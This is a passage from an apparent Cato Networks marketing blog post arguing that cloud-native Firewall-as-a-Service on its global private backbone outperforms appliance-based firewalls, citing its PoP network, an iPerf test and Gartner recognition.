What's behind this change? FWaaS, and Cato's FWaaS in particular, eliminates the cost and complexity of buying, evaluating, and upgrading firewall appliances. It also makes keeping security infrastructure up-to-date much easier. Rather than stopping everything and racing to apply new IPS signatures and software patches whenever a zero-day threat is found, Cato's FWaaS is kept updated automatically by Cato’s engineers.
Most of all, FWaaS is a better fit for the macro trends shaping your enterprise. No matter where users work or resources reside, FWaaS can deliver secure access, easily. By contrast, physical appliances are poorly suited for securing cloud resources, and virtual appliances consume significant cloud resources while requiring the same upkeep as their physical equivalents. And with users working from home, investing in appliances makes little sense. Delivering secure remote access with an office firewall requires backhauling the user’s traffic, increasing latency, and degrading the remote user experience.
[boxlink link="https://www.catonetworks.com/resources/migrating-your-datacenter-firewall-to-the-cloud/?utm_source=blog&utm_medium=top_cta&utm_campaign=datacenter_firewall"] Migrating your Datacenter Firewall to the Cloud | Download eBook [/boxlink]
Not Just FWaaS, Cloud-Native FWaaS
But to realize those benefits, it's not enough that a provider delivers FWaaS. The FWaaS must run on a global cloud-native architecture.
FWaaS offerings running on physical or virtual appliances hosted in the cloud mean resource utilization is still locked into the granularity of appliances, increasing their costs to the providers — and ultimately to their customers. Appliances also force IT leaders to think through and pay for high-availability (HA) and failover scenarios. It's not just about running redundant appliances in the cloud. What happens if the PoPs hosting those appliances fails? How do connecting locations and users failover to alternative PoPs? Does the FWaaS even have sufficient PoP density to support that failover?
By contrast, with a cloud-native FWaaS, the Cato SASE Cloud shares virtual infrastructure in a way that abstracts resource utilization from the underlying technology. The platform is stateless and fully distributed, assigning tunnels to optimum Cato's Single Pass Cloud Engine (SPACE). The Cato SPACE is the core element of the Cato SASE architecture and was built from the ground up to power a global, scalable, and resilient SASE cloud service. Thousands of Cato SPACEs enable the Cato SASE Cloud to deliver the complete set of networking and security capabilities to any user or application, anywhere in the world, at cloud scale, and as a service that is self-healing and self-maintaining.
What are the five attributes of a "cloud-native" platform? Check out this blog post, "The Cloud-Native Network: What It Means and Why It Matters," for a detailed explanation.
Key to delivering a self-healing and self-maintaining architecture without compromising performance is the geographic footprint of the FWaaS network. Without sufficient PoPs, latency grows as user traffic must first be delivered to a distant PoP and then be carried across the unpredictable Internet. By, contrast the Cato Global Private Backbone underlying Cato's FWaaS is engineered for zero packet loss, minimal latency, and maximum throughput by including WAN optimization. The backbone interconnects Cato's more than 65 PoPs worldwide. With so many PoPs, users always have a low-latency path to Cato, even if one PoP should fail.
How much better is the Cato global private backbone? An independent consultant recently tested iPerf performance across Cato, MPLS, and the Internet. Across Cato, iPerf improved by more than 1,300%. Check out the results for yourself here: https://www.sd-wan-experts.com/blog/cato-networks-hits-2-5b-and-breaks-speed-barrier/
Cato SASE Cloud: FWaaS on Steroids and a Whole Lot More
Of course, as a SASE platform, FWaaS is only one of the many services delivered by the Cato SASE Cloud. In addition to a global private backbone that can replace any global MPLS service at a fraction of the cost, Cato's networking capabilities includes edge SD-WAN, optimized secure remote access, and accelerated cloud datacenter integration.
FWaaS is only one of Cato's many security services. Other security services include a secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), managed IPS-as-a-Service (IPS), and comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints.
And, all services are seamlessly and continuously updated by Cato's dedicated networking and security experts to ensure maximum availability, optimal network performance, and the highest level of protection against emerging threats.
FWaaS: A Better Way to Protect the Enterprise
In our opinion, Gartner expert’s inclusion of Cato SASE Cloud in the Magic Quadrant is recognition of the unique benefits cloud-native FWaaS brings to the enterprise. FWaaS build on appliances simply cannot meet enterprise requirements, not for performance nor uptime. Cato’s cloud-native approach not only made FWaaS possible, but we proved that it can meet the needs of the vast majority of sites and users. Over time, cloud-native FWaaS will become the dominant deployment model for enterprise security.
And Cato isn’t stopping there. Every quarter we expand our backbone, adding more PoPs. All of those PoPs run our complete SASE stack; they don’
